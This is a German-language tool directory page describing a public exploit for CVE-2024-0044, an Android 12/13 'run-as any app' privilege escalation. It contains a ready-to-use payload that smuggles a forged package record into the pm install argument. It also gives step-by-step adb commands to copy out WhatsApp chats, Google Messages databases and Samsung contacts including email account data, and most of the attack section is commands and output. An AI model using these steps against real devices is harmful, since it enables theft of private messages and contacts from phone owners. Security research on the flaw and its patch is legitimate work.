Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve_2024_0044 — CVE-2024-0044: eine „run-as any app"-Schwachstelle mit hohem Schweregrad, die Android-Versionen 12 und 13 betrifft | Kitploit
Tools/GitHubGitHub/hunter24x24/cve_2024_0044
Android-SicherheitPrivilege EscalationSchwachstellenanalyseExploitationDatenexfiltrationPost-ExploitationPenetrationstestsMobile Sicherheit
GitHubhunter24x24/cve_2024_0044

cve_2024_0044

CVE-2024-0044: eine „run-as any app"-Schwachstelle mit hohem Schweregrad, die Android-Versionen 12 und 13 betrifft

Repository anzeigen
12vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE 2024 0044

CVE-2024-0044, identifiziert in der Funktion createSessionInternal der Datei PackageInstallerService.java, ist eine Schwachstelle mit hohem Schweregrad, die Android-Versionen 12 und 13 betrifft. Diese Schwachstelle ermöglicht es einem Angreifer, einen „run-as any app“-Angriff durchzuführen, der zu einer lokalen Privilegienausweitung führt, ohne dass eine Benutzerinteraktion erforderlich ist. Das Problem entsteht aufgrund einer fehlerhaften Eingabevalidierung in der createSessionInternal-Funktion. Ein Angreifer kann dies ausnutzen, indem er den Sitzungserstellungsprozess manipuliert und möglicherweise unbefugten Zugriff auf sensible Daten erhält und unbefugte Aktionen auf dem betroffenen Gerät durchführt.

Der Exploit wurde von Meta security entdeckt.

Der Proof of Concept wurde von Tiny hack zusammengefasst und geteilt.

Details zum Sicherheitspatch finden Sie im Android security bulletin.

Voraussetzungen

  1. Aktivieren Sie USB-Debugging auf Ihrem Mobiltelefon und verbinden Sie es über ein USB-Kabel oder drahtloses Debugging mit Ihrem Rechner.
  2. Laden Sie eine beliebige APK auf Ihren Rechner herunter – Sie können F-DROID verwenden.

So verwenden Sie das Tool

root@kitploit:~
python3 cve_2024_0044.py -h
                                                                               
##########################################################################################
###############S%%#####################################################%%S################
###############%++*S##################################################?++?################
################%++*S###############################################S*++?#################
#################%+++%#############################################S*++%##################
##################S*++%###########################################%+++%###################
###################S*++?#########SSS%%?????***?????%%%SS#########%++*S####################
#####################?++*##S%%?**+++++++++++++++++++++++**??%S##?++*S#####################
######################?++**+++++++++++++++++++++++++++++++++++**++*#######################
###################S%?*++++++++++++++++++++++++++++++++++++++++++++?%S####################
#################%?+++++++++++++++++++++++++++++++++++++++++++++++++++*%S#################
##############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++?S###############
############S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S#############
##########S?+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S###########
#########%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##########
#######S*+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++*S########
######%++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*++++++++++++++%#######
#####%++++++++++++++*######%+++++++++++++++++++++++++++++++++%######?++++++++++++++?######
####?+++++++++++++++*######S+++++++++++++++++++++++++++++++++%######?+++++++++++++++?#####
###%+++++++++++++++++*%SS%?+++++++++++++++++++++++++++++++++++?%SS%*+++++++++++++++++?####
##S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%###
##*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S##
#%+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++?##
#*++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++S#
S+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++%#      
        
usage: cve_2024_0044.py [-h] -P P -A A

CVE-2024-0044: run-as any app @Pl4int3xt

options:
  -h, --help  show this help message and exit
  -P P        package name (default: None)
  -A A        apk file path (default: None)

-P wird verwendet, um den Zielpaketnamen anzugeben, als den Sie ausgeführt werden möchten.

-A gibt den Pfad der APK-Datei an, die auf das Gerät übertragen werden soll.

Exploitation

Führen Sie das Tool aus: python3 cve_2024_0044.py -P com.whatsapp -A /home/pl4int3xt/Downloads/F-Droid.apk

Es wird eine Datei payload.txt wie diese erstellt:

root@kitploit:~
PAYLOAD="@null
victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk

Das Tool automatisiert einige Teile, andere sind manuell. Sie können nach der Erstellung des Payloads beenden und alle Befehle manuell ausführen oder mit den Anweisungen fortfahren.

Als nächstes müssen Sie sich über adb shell mit Ihrem Gerät verbinden, den Payload einfügen und sicherstellen, dass nach dem letzten Befehl eine „Success“-Meldung erscheint.

root@kitploit:~
pl4int3xt ~>  adb shell
pixel:/ $ PAYLOAD="@null
> victim 10289 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
pixel:/ $ pm install -i "$PAYLOAD" /data/local/tmp/F-Droid.apk
Success

Als nächstes erhalten wir die WhatsApp-Daten mit den folgenden Befehlen:

root@kitploit:~
pixel:/ $ mkdir /data/local/tmp/wa/                                                                            
pixel:/ $ touch /data/local/tmp/wa/wa.tar
pixel:/ $ chmod -R 0777 /data/local/tmp/wa/
pixel:/ $ run-as victim
pixel:/data/user/0 $ tar -cf /data/local/tmp/wa/wa.tar com.whatsapp

Erstellen Sie ein temporäres Verzeichnis: mkdir /data/local/tmp/wa/

Erstellen Sie einen Platzhalter für eine tar-Datei: touch /data/local/tmp/wa/wa.tar

Setzen Sie weit offene Berechtigungen: chmod -R 0777 /data/local/tmp/wa/, um sicherzustellen, dass jeder Benutzer in diesem Verzeichnis lesen, schreiben und ausführen kann.

Wechseln Sie den Benutzerkontext: run-as victim, um die gleichen Berechtigungen wie der „victim“-Benutzer zu erhalten.

Archivieren Sie die Daten der Zielanwendung: tar -cf /data/local/tmp/wa/wa.tar com.whatsapp, um ein Tarball des WhatsApp-Datenverzeichnisses zu erstellen.

Abschließend die Daten abrufen

adb pull /data/local/tmp/wa/wa.tar

Sie können die Daten mit 7z oder einem anderen Tool extrahieren.

Sie können Whatsapp chat exporter verwenden, um sie in HTML zu konvertieren.

Auf diese Weise können Sie WhatsApp-Daten ohne Root-Zugriff auf Ihrem Gerät abrufen.

Google Messages abrufen

Ändern Sie einfach den Paketnamen wie folgt:

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.google.android.apps.messaging -A ~/Down
loads/F-Droid.apk

Folgen Sie den obigen Anweisungen. Nachdem Sie die Datei wa.tar abgerufen haben, entpacken Sie sie und öffnen Sie die Unterhaltungen in com.google.android.apps.messaging/databases/bugle_db mit sqlitebrowser oder einem anderen Tool.

Kontakte abrufen

Getestet für Samsung-Geräte. Überprüfen Sie bei anderen Geräten den Paketnamen des Kontakteanbieters.

root@kitploit:~
plaintext@archlinux ~/D/c/p/cve_2024_0044 (feature)> python3 ./cve_2024_0044.py -P com.samsung.android.app.contacts -A ~/Downloads/F-Droid.apk

Folgen Sie den obigen Anweisungen. Nachdem Sie die Datei wa.tar abgerufen haben, entpacken Sie sie und öffnen Sie die Kontakte in com.samsung.android.providers.contacts/databases/contacts2.db mit sqlitebrowser oder einem anderen Tool. Die DB-Datei enthält alle Informationen zu den E-Mail-Konten des Benutzers zusammen mit der Kontaktliste.

Tool herunterladen